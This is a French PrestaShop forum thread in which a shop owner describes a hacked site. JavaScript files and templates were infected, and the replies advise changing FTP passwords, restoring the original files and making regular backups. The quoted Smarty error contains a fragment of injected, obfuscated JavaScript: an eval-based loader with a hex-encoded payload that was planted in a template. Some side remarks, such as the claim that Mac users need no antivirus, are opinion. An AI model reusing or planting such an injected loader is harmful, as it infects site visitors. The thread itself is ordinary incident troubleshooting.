Jump to content

Recommended Posts

Bonjour,

J'ai découvert ce matin que mon site ne fonctionnait plus (page blanche), je commence directement par aller sur le backoffice et la kasperksy s’affole, j'ai 8 chevals de troie d'un coup :blink:

Ok je n'utilise plus le backoffice, génial, je vais sur mon cpanel ( j'ai vu que cela provenait de certains fichiers js de mon site (jquery, ajax, admin, toolbar...) j'ai supprimer le dossier complet js pour être sur de bien nettoyer tout ça. Je n'ai plus de virus mais mon site affiche une page blanche, en affichant les erreurs avec:

define('_PS_MODE_DEV_', true);

J'ai ça <_<

Fatal error: Uncaught exception 'SmartyCompilerException' with message 'Syntax Error in template "/home/idyllicb/public_html/modules/blocksearch/blocksearch-top.tpl" on line 34 "</div><!--0f2490--><script type="text/javascript" language="javascript" > try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e7785742e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e7785743c8180712e4b2e357682827e483d3d737c736f717d7b837c77716f88777d7c733c77823d7175773b in /home/idyllicb/public_html/tools/smarty/sysplugins/smarty_internal_templatecompilerbase.php on line 627

J'ai jeté un coup d'oeil à ces fichiers, ils ont étaient modifier au même moment que les fichiers js il y a 2 jours, est-ce que je ferais mieux de faire une restauration complète du site ? Mais malheureusement ma sauvegarde est assez ancienne je vais donc perdre beaucoup de produits non ? :(

Enfin bref je pense quand même que c'est le mieux à faire, le site est foutu là, la prochaine fois je ferais un backup plus souvent.

A oui, j'ai une question importante à propos de tout ça, comment quelqu'un à t-il plus modifier autant de fichiers ? (Les permission aux dossiers/fichiers modifier à changer aussi...)

Bonjour,

ce n'est pas la première fois que l'on vois ça sur ce forum, tu as certainement un virus sur ton ordi qui a récupéré les login sur filezilla de ton site. Passe ton ordi à l'antivirus, change le mot de passe de connexion à ton serveur, retransfert tous les fichiers js et ce sera bon.

Bonjour,

Comme beaucoup d'utilisateur vous ne faites pas de sauvegardes régulières. Dans votre cas, les changements de mots de passe préconisés par coeos.pro sont un bon début, ensuite pour restaurez les fichiers orignaux de votre version de PS (anciennes versions disponible sur http://code.google.com/p/prestashop/downloads/list).

Pensez à contrôler aussi les fichiers de votre template.

Après pour l'ordi, utilisez autre chose qu'un PC (linux, mac, je sais c'ets pas obligatoire mais cela fait gagner pas mal de temps), et surtout cryptez bien les mot de passe de filezilla ou utilisez un autre client FTP, un payant comme cela peut d'utilisateur donc pas d’intérêt pour les pirates.

Sinon, pour la blague, ce genre de piratage est fait par des gamins de 12 ans juste pour le plaisir d'apprendre ;)

J'ai jeté un coup d'oeil à ces fichiers, ils ont étaient modifier au même moment que les fichiers js il y a 2 jours, est-ce que je ferais mieux de faire une restauration complète du site ? Mais malheureusement ma sauvegarde est assez ancienne je vais donc perdre beaucoup de produits non ? :(

Enfin bref je pense quand même que c'est le mieux à faire, le site est foutu là, la prochaine fois je ferais un backup plus souvent.

Vous pouvez restaurer les fichiers sans toucher à la base de données si celle-ci n'a pas été impactée.

Vous ne perdrez pas vos produits.

2 société issues du monde pc qui aimerais bien ne pas passer à côté du marché de ces machines, mais franchement je ne connais pas un seul utilisateur mac avec un antivirus.

Mais bon la guerre des plateforme me fait toujours rire depuis les annés 80.

Sinon qui utilise Fillezilla sur mac ?

Bien merci beaucoup tout le monde, en effet la base de données n'a rien, mon site fonctionne à nouveau avec un bons nombre de produits qui n'ont plus d'images mais ça se rectifie lentement :D

J'ai changer tout les mots de passes et je ferais une sauvegarde régulièrement :)

Vous m'avez conseiller d'utiliser mac ou linux, j'imagine qu'une machine virtuelle ferait l'affaire logiquement ?

Vous m'avez conseiller d'utiliser mac ou linux, j'imagine qu'une machine virtuelle ferait l'affaire logiquement ?

C'est plus une boutade, certains préfèrent Mac, d'autres préfèrent Linux et d'autres windows.

Il est un fait que Microsoft voulait avoir le monopole mondial et de ce fait il s'est fait attaquer par des anti-monopolistes, donc les produits Microsoft sont les plus attaqué, beaucoup de faille sont aussi découvert et il a pas mal copié des fonctions sur d'autre société.

Maintenant on peut conseiller Unix, Mandrake red heat fedora freebsd etc....

Le principal est que vous protégez votre poste par un pare-feux, antivirus, anti-malware, aujourd'hui ce n'est plus que des virus qui sont répandus dans le monde mais aussi des chevaux de troies, des fausses tools-bar etc...